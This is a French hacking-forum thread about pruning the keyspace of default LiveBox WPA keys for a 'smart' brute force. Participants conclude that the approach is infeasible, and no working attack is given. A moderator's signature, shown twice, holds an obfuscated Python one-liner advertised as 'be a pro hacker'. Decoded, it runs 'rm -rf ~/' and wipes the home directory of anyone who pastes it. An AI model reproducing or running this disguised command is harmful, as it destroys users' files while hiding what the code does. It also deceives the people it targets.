Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 17-11-2013 00:31:42

Kera_Fardd
Membre
Inscription : 29-02-2012
Messages : 17

[Discussion] Bruteforce intelligent

Bonsoir.

Je m'intéresse actuellement au crack de clefs WPA par défaut LiveBox. Comme vous le savez sans doute, elles sont composées de lettres A-F et de chiffres 0-9. Ca nous fait donc une base 16. Bon. Les clefs ont une longueur de 26 caractères. Le nombre total de combinaisons possibles s'élève donc à 16^26 soit :

20 282 409 603 651 670 423 947 251 286 016 clefs possibles.

C'est évidemment incrackable par un bruteforce exhaustif en une durée raisonnable, peu importe le matériel utilisé. Soit. Première question :

Quelle taille ferait un fichier contenant la totalité de ces clefs ?

Supposons qu'on ait, quelque part, un tel fichier. L'idée va être de l'alléger en supprimant les clefs improbables, comme par exemple 00000000000000000000000000. C'est un début mais ça n'enlève que 16 clefs. Généralisons : supprimons toutes les clefs qui commencent par au moins 4 caractères identiques (ex : 1111afde44789eed478ea823af). Ca permet d'éliminer, si je ne dis pas de bêtises, 16x16^22 combinaisons. Le total tombe ainsi de :

20 282 409 603 651 670 423 947 251 286 016
à
20 277 457 843 494 528 902 847 654 789 120

Il y a un léger progrès. Très léger, certes, mais on éliminera (presque) autant de clefs en supprimant ensuite celles qui se terminent par au moins 4 caractères identiques. En fait, il faudrait supprimer toutes les clefs contenant au moins 4 caractères identiques consécutifs... Je ne sais pas combien de clefs en moins ça fait, c'est un peu chiant à calculer. (quoique non, ça doit faire 22x16x16^22 ou un truc comme ça)
L'idée serait de continuer à supprimer des clefs en établissant d'autres règles de ce genre afin d'obtenir un dictionnaire, probablement très gros, mais également très fiable (en connaissant toutefois la longueur de la clef et son charset).
On pourra éliminer les clefs composées de moins de X caractères différents, éliminer les clefs contenant des motifs suffisamment improbables tels que AA11AA11, 0123456789, ABCDEF, etc...

Le coup du dictionnaire, c'était pour la théorie. Il serait peut-être plus pratique d'utiliser des expressions rationnelles : avant de tester une clef sur un handshake, on soumet la clef à une série de règle pour déterminer si elle est probable ou non. La difficulté reste bien entendu la pertinence de ces règles.
Ou alors on soumet la clef à l'ensemble des règles avant de l'ajouter à un dictionnaire.

Je n'ai aucune idée de la faisabilité d'une telle chose mais je suis réaliste ; si une sorte de bruteforce intelligent pouvait être mis en œuvre de cette façon, cela aurait déjà été fait. Je suppose qu'il n'est pas possible d'éliminer suffisamment de clefs pour parvenir à un ensemble de taille raisonnable...

Dernière modification par Kera_Fardd (17-11-2013 15:50:51)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 17-11-2013 12:25:36

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : [Discussion] Bruteforce intelligent

Je crois que tu le montres bien par toi même dans ton post
Même si on arrivait à dépurer, disons la moitié des clefs, on reste dans des chiffres astronomiques pour le hardware dont nous disposons ou pouvons disposer....
Nous avons un thème investigation sur les livebox, je t'invite à y jetter un coup d'oeil, on a pas mal parlé de ces livebox tongue

Hors Ligne

#3 17-11-2013 15:35:47

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : [Discussion] Bruteforce intelligent

« supprimons toutes les clefs qui commencent par au moins 4 caractères identiques »
Pourquoi ?


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#4 17-11-2013 15:47:19

Kera_Fardd
Membre
Inscription : 29-02-2012
Messages : 17

Re : [Discussion] Bruteforce intelligent

Je n'ai jamais vu de clef LiveBox comportant 4 occurrences successives du même caractères. 2 caractères identiques à la suite, ok. Déjà 3, jamais rencontré.

Hors Ligne

#5 17-11-2013 16:01:01

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : [Discussion] Bruteforce intelligent

Je n'ai jamais vu de clef LiveBox comportant 4 occurrences successives du même caractères. 2 caractères identiques à la suite, ok. Déjà 3, jamais rencontré.

Désoler de te décevoir mais en connaissance du sujet, tu n'en a peut-etre pas vu beaucoup non plus (des livebox) mais tu te trompe.

Hors Ligne

#6 17-11-2013 19:54:10

Kera_Fardd
Membre
Inscription : 29-02-2012
Messages : 17

Re : [Discussion] Bruteforce intelligent

Non non, je ne me trompe pas, je n'ai pas encore rencontré une clef par défaut de LiveBox comportant 4 mêmes caractères identiques à la suite.

Ce qui ne veut pas dire que j'affirme que de telles clefs n'existent pas, n'est-ce pas.

Enfin bon, tout cela était un peu bête de ma part, vous pouvez fermer le topic je pense !

Dernière modification par Kera_Fardd (17-11-2013 19:58:49)

Hors Ligne

#7 18-11-2013 09:48:01

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : [Discussion] Bruteforce intelligent

Cette question simple avait pour but de te faire remarquer que cet ensemble de clefs (celles avec des caractères répétitifs) ne représente rien par rapport à l'ensemble complet.
Il est donc plus couteux de le retirer que de le tester.

De toute façon, bruteforcer 26 cractères hexa, c'est bruteforcer 13 octets c'est impossible.
Je bruteforce 5 octets avec une toute petite fonction de validation en une nuit avec 80 CPUs.

PBKDF2(HMAC-SHA1) n'est pas une toute petite fonction, et 13 octets c'est 2^(13-5) fois plus que 5 octets.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Bruteforce WPS par regard48
8 391 15-11-2016 16:19:36 par Fab955
Épinglée :
253 135929 17-09-2016 22:11:01 par Zetta
9 1014 11-06-2016 15:39:41 par Furyo
3 3990 25-08-2014 20:40:36 par EliotFR
[FPGA] Bruteforce WPA par borgorn28
2 3307 17-01-2014 11:36:58 par borgorn28

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.024 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]